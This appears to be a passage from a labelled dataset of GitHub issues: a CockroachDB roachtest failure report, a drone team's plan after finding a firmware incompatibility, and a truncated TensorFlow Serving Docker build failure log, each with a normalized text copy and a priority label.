[O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202005112258_v19.2.7](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202005112258_v19.2.7) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #45698 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-release-19.2](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-release-19.2) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) [See this test on roachdash](https://roachdash.crdb.dev/?filter=status%3Aopen+t%3A.%2Akv%2Fcontention%2Fnodes%3D4.%2A&sort=title&restgroup=false&display=lastcommented+project) <sub>powered by [pkg/cmd/internal/issues](https://github.com/cockroachdb/cockroach/tree/master/pkg/cmd/internal/issues)</sub></p></details>
2.0
roachtest: kv/contention/nodes=4 failed - [(roachtest).kv/contention/nodes=4 failed](https://teamcity.cockroachdb.com/viewLog.html?buildId=2076004&tab=buildLog) on [provisional_202007081918_v20.2.0-alpha.2@cf051c8c91d5e1d5196e6d2fdc9382364e1d44e8](https://github.com/cockroachdb/cockroach/commits/cf051c8c91d5e1d5196e6d2fdc9382364e1d44e8): ``` The test failed on branch=provisional_202007081918_v20.2.0-alpha.2, cloud=gce: test artifacts and logs in: /home/agent/work/.go/src/github.com/cockroachdb/cockroach/artifacts/kv/contention/nodes=4/run_1 ts_util.go:116,kv.go:259,cluster.go:2449,errgroup.go:57: average txns per second 14.725106 was under target 100.000000 cluster.go:2471,kv.go:262,test_runner.go:757: monitor failure: monitor task failed: t.Fatal() was called (1) attached stack trace | main.(*monitor).WaitE | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2459 | main.(*monitor).Wait | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2467 | main.registerKVContention.func1 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/kv.go:262 | main.(*testRunner).runTest.func2 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/test_runner.go:757 Wraps: (2) monitor failure Wraps: (3) attached stack trace | main.(*monitor).wait.func2 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2515 Wraps: (4) monitor task failed Wraps: (5) attached stack trace | main.init | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2429 | runtime.doInit | /usr/local/go/src/runtime/proc.go:5420 | runtime.main | /usr/local/go/src/runtime/proc.go:190 | runtime.goexit | /usr/local/go/src/runtime/asm_amd64.s:1373 Wraps: (6) t.Fatal() was called Error types: (1) *withstack.withStack (2) *errutil.withMessage (3) *withstack.withStack (4) *errutil.withMessage (5) *withstack.withStack (6) *errors.errorString ``` <details><summary>More</summary><p> Artifacts: [/kv/contention/nodes=4](https://teamcity.cockroachdb.com/viewLog.html?buildId=2076004&tab=artifacts#/kv/contention/nodes=4) Related: - #51028 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202006292135_v19.2.9](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202006292135_v19.2.9) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #50864 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-master](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-master) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #50542 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202006230817_v19.2.8](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202006230817_v19.2.8) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #48727 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202005112258_v19.2.7](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202005112258_v19.2.7) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #45698 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-release-19.2](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-release-19.2) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) [See this test on roachdash](https://roachdash.crdb.dev/?filter=status%3Aopen+t%3A.%2Akv%2Fcontention%2Fnodes%3D4.%2A&sort=title&restgroup=false&display=lastcommented+project) <sub>powered by [pkg/cmd/internal/issues](https://github.com/cockroachdb/cockroach/tree/master/pkg/cmd/internal/issues)</sub></p></details>
non_priority
roachtest kv contention nodes failed on the test failed on branch provisional alpha cloud gce test artifacts and logs in home agent work go src github com cockroachdb cockroach artifacts kv contention nodes run ts util go kv go cluster go errgroup go average txns per second was under target cluster go kv go test runner go monitor failure monitor task failed t fatal was called attached stack trace main monitor waite home agent work go src github com cockroachdb cockroach pkg cmd roachtest cluster go main monitor wait home agent work go src github com cockroachdb cockroach pkg cmd roachtest cluster go main registerkvcontention home agent work go src github com cockroachdb cockroach pkg cmd roachtest kv go main testrunner runtest home agent work go src github com cockroachdb cockroach pkg cmd roachtest test runner go wraps monitor failure wraps attached stack trace main monitor wait home agent work go src github com cockroachdb cockroach pkg cmd roachtest cluster go wraps monitor task failed wraps attached stack trace main init home agent work go src github com cockroachdb cockroach pkg cmd roachtest cluster go runtime doinit usr local go src runtime proc go runtime main usr local go src runtime proc go runtime goexit usr local go src runtime asm s wraps t fatal was called error types withstack withstack errutil withmessage withstack withstack errutil withmessage withstack withstack errors errorstring more artifacts related roachtest kv contention nodes failed roachtest kv contention nodes failed roachtest kv contention nodes failed roachtest kv contention nodes failed roachtest kv contention nodes failed powered by
0
33,353
27,401,936,926
IssuesEvent
2023-03-01 01:48:42
MissouriMRR/Argonia-Cup-2023
https://api.github.com/repos/MissouriMRR/Argonia-Cup-2023
reopened
New Plan of Action
bug question infrastructure
# New Plan of Action ## Problem An issue has arisen that means none of our code will work on the bone drone. The firmware that the drone will be running is incompatible with our current flight code for Argonia Cup. ## Solution Figure out the next course of action for doing the Argonia Cup autonomously. Will need a quick turnaround if we intend to use any code for this competition. ## Additional Information Due to unforeseen constraints, the drone will be using the INav firmware on its flight controller. This firmware is completely incompatible with our current flight communication library `mavsdk`, meaning that our code will not be usable with the drone. An additional issue is that we will need to implement additional communication infrastructure to use the extra elrs module that will be on the drone, although this problem is less pressing. ## Options Moving forward, we need to pick a new course of action if we still intend to do the Argonia Cup autonomously. Here are the major options that I thought of: - Reimplement the flight code with a library that is compatible with INav. I found this library that may work, although it seems to be poorly maintained and will require a lot of research to get going: https://github.com/thecognifly/YAMSPy . If we do go this route, we will need a quick turnaround in order to be able to test the code before competition. - More likely route: Use mission planner instead of our code to perform the competition autonomously. - Don't do the competition autonomously. We will avoid this if at all possible. Whatever route we choose will require a very quick turnaround if we are going to be able to test and validate it before the competition.
1.0
New Plan of Action - # New Plan of Action ## Problem An issue has arisen that means none of our code will work on the bone drone. The firmware that the drone will be running is incompatible with our current flight code for Argonia Cup. ## Solution Figure out the next course of action for doing the Argonia Cup autonomously. Will need a quick turnaround if we intend to use any code for this competition. ## Additional Information Due to unforeseen constraints, the drone will be using the INav firmware on its flight controller. This firmware is completely incompatible with our current flight communication library `mavsdk`, meaning that our code will not be usable with the drone. An additional issue is that we will need to implement additional communication infrastructure to use the extra elrs module that will be on the drone, although this problem is less pressing. ## Options Moving forward, we need to pick a new course of action if we still intend to do the Argonia Cup autonomously. Here are the major options that I thought of: - Reimplement the flight code with a library that is compatible with INav. I found this library that may work, although it seems to be poorly maintained and will require a lot of research to get going: https://github.com/thecognifly/YAMSPy . If we do go this route, we will need a quick turnaround in order to be able to test the code before competition. - More likely route: Use mission planner instead of our code to perform the competition autonomously. - Don't do the competition autonomously. We will avoid this if at all possible. Whatever route we choose will require a very quick turnaround if we are going to be able to test and validate it before the competition.
non_priority
new plan of action new plan of action problem an issue has arisen that means none of our code will work on the bone drone the firmware that the drone will be running is incompatible with our current flight code for argonia cup solution figure out the next course of action for doing the argonia cup autonomously will need a quick turnaround if we intend to use any code for this competition additional information due to unforeseen constraints the drone will be using the inav firmware on its flight controller this firmware is completely incompatible with our current flight communication library mavsdk meaning that our code will not be usable with the drone an additional issue is that we will need to implement additional communication infrastructure to use the extra elrs module that will be on the drone although this problem is less pressing options moving forward we need to pick a new course of action if we still intend to do the argonia cup autonomously here are the major options that i thought of reimplement the flight code with a library that is compatible with inav i found this library that may work although it seems to be poorly maintained and will require a lot of research to get going if we do go this route we will need a quick turnaround in order to be able to test the code before competition more likely route use mission planner instead of our code to perform the competition autonomously don t do the competition autonomously we will avoid this if at all possible whatever route we choose will require a very quick turnaround if we are going to be able to test and validate it before the competition
0
67,179
16,829,277,517
IssuesEvent
2021-06-18 00:21:31
tensorflow/serving
https://api.github.com/repos/tensorflow/serving
closed
TFX CPU Optimization Compiling in Docker Multiple Compile Steps Failure
stat:awaiting tensorflower type:build/install
## Bug Report ### System information - **OS Platform and Distribution (e.g., Linux Ubuntu 16.04)**: MAC OS BigSir 11.2.3 - **TensorFlow Serving installed from (source or binary)**: Source - **TensorFlow Serving version**: 2.4.1 ### Describe the problem I need to compile an CPU optimized version for tensorflow serving. Operations is based on the document page https://www.tensorflow.org/tfx/serving/building_with_docker And I fail to bazel build the docker tfx in the docker for 4 times which are consistently have the same problem. Also the total compiling time is longer than 3hours, it is normal? ### Exact Steps to Reproduce Here is the shell file to do run the building:**tfx_cpu_compile.sh** ``` #!/bin/bash USER=$1 TAG=$2 TF_SERVING_VERSION_GIT_BRANCH="2.4.1" git clone --branch="${TF_SERVING_VERSION_GIT_BRANCH}" https://github.com/tensorflow/serving TF_SERVING_BUILD_OPTIONS="--copt=-mavx --local_ram_resources=4096" cd serving && \ docker buildx build --pull -t $USER/tensorflow-serving-devel:$TAG \ --build-arg TF_SERVING_VERSION_GIT_BRANCH="${TF_SERVING_VERSION_GIT_BRANCH}" \ --build-arg TF_SERVING_BUILD_OPTIONS="${TF_SERVING_BUILD_OPTIONS}" \ -f tensorflow_serving/tools/docker/Dockerfile.devel . ``` Here is the command for running the shell file ` ./tfx_cpu_compile.sh rogeryuchao 1.0.0` ### Source code / logs There are bunch of ERROR message, and I'm not quite sure which one is the contributor to this failure building. ``` WARN[0000] No output specified for docker-container driver. Build result will only remain in the build cache. To push result image into registry use --push or to load image into docker use --load [+] Building 9484.7s (16/18) => [internal] load build definition from Dockerfile.devel 0.0s => => transferring dockerfile: 4.77kB 0.0s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [internal] load metadata for docker.io/library/ubuntu:18.04 3.5s => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s => [base_build 1/10] FROM docker.io/library/ubuntu:18.04@sha256:538529c9d229fb55f50e6746b119e899775205d62c0fc1b7e679b30d02ecb6e8 0.0s => => resolve docker.io/library/ubuntu:18.04@sha256:538529c9d229fb55f50e6746b119e899775205d62c0fc1b7e679b30d02ecb6e8 0.0s => CACHED [base_build 2/10] RUN apt-get update && apt-get install -y --no-install-recommends automake build-essential ca 0.0s => CACHED [base_build 3/10] RUN curl -fSsL -O https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py 0.0s => CACHED [base_build 4/10] RUN add-apt-repository ppa:deadsnakes/ppa && apt-get update && apt-get install -y python3.6 python3.6-dev py 0.0s => CACHED [base_build 5/10] RUN update-alternatives --install /usr/bin/python python /usr/bin/python3.6 0 0.0s => CACHED [base_build 6/10] RUN pip3 --no-cache-dir install future>=0.17.1 grpcio h5py keras_applications>=1.0.8 keras_prepr 0.0s => CACHED [base_build 7/10] RUN mkdir /bazel && cd /bazel && curl -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KH 0.0s => CACHED [base_build 8/10] WORKDIR /tensorflow-serving 0.0s => CACHED [base_build 9/10] RUN git clone --branch=2.4.1 https://github.com/tensorflow/serving . && git remote add upstream https://github.c 0.0s => CACHED [binary_build 1/4] RUN echo "Building with build options: --copt=-mavx --local_ram_resources=4096" 0.0s => CACHED [binary_build 2/4] RUN echo "Building with Bazel options: " 0.0s => ERROR [binary_build 3/4] RUN bazel build --color=yes --curses=yes --verbose_failures --output_filter=DONT_MATCH_ANYTHING - 9481.0s ------ > [binary_build 3/4] RUN bazel build --color=yes --curses=yes --verbose_failures --output_filter=DONT_MATCH_ANYTHING --copt=-mavx --local_ram_resources=4096 tensorflow_serving/model_servers:tensorflow_model_server && cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server /usr/local/bin/: #16 0.250 Extracting Bazel installation... #16 2.324 Starting local Bazel server and connecting to it... WARNING: Download from https://mirror.bazel.build/github.com/tensorflow/tensorflow/archive/85c8b2a817f95a3e979ecd1ed95bff1dc1335cff.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found DEBUG: Rule 'io_bazel_rules_docker' indicated that a canonical reproducible form can be obtained by modifying arguments shallow_since = "1556410077 -0400" DEBUG: Call stack for the definition of repository 'io_bazel_rules_docker' which is a git_repository (rule definition at /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/bazel_tools/tools/build_defs/repo/git.bzl:195:18): #16 35.42 - <builtin> #16 35.42 - /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/bazel_toolchains/repositories/repositories.bzl:37:9 #16 35.42 - /tensorflow-serving/WORKSPACE:42:1 WARNING: Download from https://mirror.bazel.build/github.com/aws/aws-sdk-cpp/archive/1.7.336.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found WARNING: Download from https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/f402e682d0ef5598eeffc9a21a691b03e602ff58.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found INFO: Analyzed target //tensorflow_serving/model_servers:tensorflow_model_server (254 packages loaded, 18977 targets configured). INFO: Found 1 target... ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/BUILD:382:5: Couldn't build file external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o: C++ compilation of rule '@org_tensorflow//tensorflow/compiler/mlir/tensorflow:tensorflow_ops_n_z' failed (Exit 4): gcc failed: error executing command #16 3126.6 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3126.6 exec env - \ #16 3126.6 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3126.6 PWD=/proc/self/cwd \ #16 3126.6 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3126.6 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o' -DLLVM_ENABLE_STATS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -DLLVM_BUILD_GLOBAL_ISEL -DTF_USE_SNAPPY -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/llvm-project -iquote bazel-out/k8-opt/bin/external/llvm-project -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/CallOpInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/InferTypeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/OpAsmInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/RegionKindInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SideEffectInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SymbolInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/DerivedAttributeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/LoopLikeInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ParserTokenKinds -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ControlFlowInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/StandardOpsIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/VectorInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ViewLikeInterfaceIncGen -isystem external/llvm-project/mlir/include -isystem bazel-out/k8-opt/bin/external/llvm-project/mlir/include -isystem external/llvm-project/llvm/include -isystem bazel-out/k8-opt/bin/external/llvm-project/llvm/include -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o) #16 3126.6 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/tensor.h:23, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/attr_value_util.h:24, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/node_def_util.h:23, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/shape_inference.h:21, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/common_shape_fns.h:20, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:25, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.h:35, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:16: #16 3126.6 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3126.6 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3126.6 ^ #16 3126.6 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3126.6 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3126.6 ^ #16 3126.6 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:27, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.h:35, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:16: #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3126.6 TransactionToken** token) { #16 3126.6 ^~~~~ #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3126.6 TransactionToken** token) { #16 3126.6 ^~~~~ #16 3126.6 In file included from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:77:0: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: In function 'mlir::ArrayAttr mlir::TF::{anonymous}::ShuffleArrayAttr(mlir::ArrayAttr, llvm::ArrayRef<long int>, int)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:320:26: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (size_t j = 0; j < inner_size; ++j) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: In function 'bool mlir::TF::{anonymous}::AreCancellablePermutations(mlir::DenseIntElementsAttr, mlir::DenseIntElementsAttr)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:357:21: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (int i = 0; i < perm0_values.size(); ++i) { #16 3126.6 ~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::OneHotOp)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:119:42: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 !(axis == -1 || (axis >= 0 && axis <= indices_ty.getShape().size()))) { #16 3126.6 ~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In member function 'mlir::OpFoldResult mlir::TF::PackOp::fold(llvm::ArrayRef<mlir::Attribute>)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:301:24: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (arg_ty.getRank() != values().size()) return {}; #16 3126.6 ~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In member function 'mlir::LogicalResult mlir::TF::PadOp::FoldOperandsPermutation(llvm::ArrayRef<long int>)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:323:39: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 paddings_value.getNumElements() != permutation.size() * 2) #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::ParseExampleV2Op)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:379:23: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.num_sparse() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:383:34: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.sparse_indices().size() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:387:33: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.sparse_shapes().size() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::{anonymous}::VerifyShapeOperandAndResult(mlir::Operation*, mlir::Type, mlir::Type, int)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:871:42: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 result_ranked_type.getDimSize(0) != #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~ #16 3126.6 operand_ranked_type.getShape().size()) #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::SpaceToBatchNDOp)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1270:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1286:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In static member function 'static mlir::LogicalResult 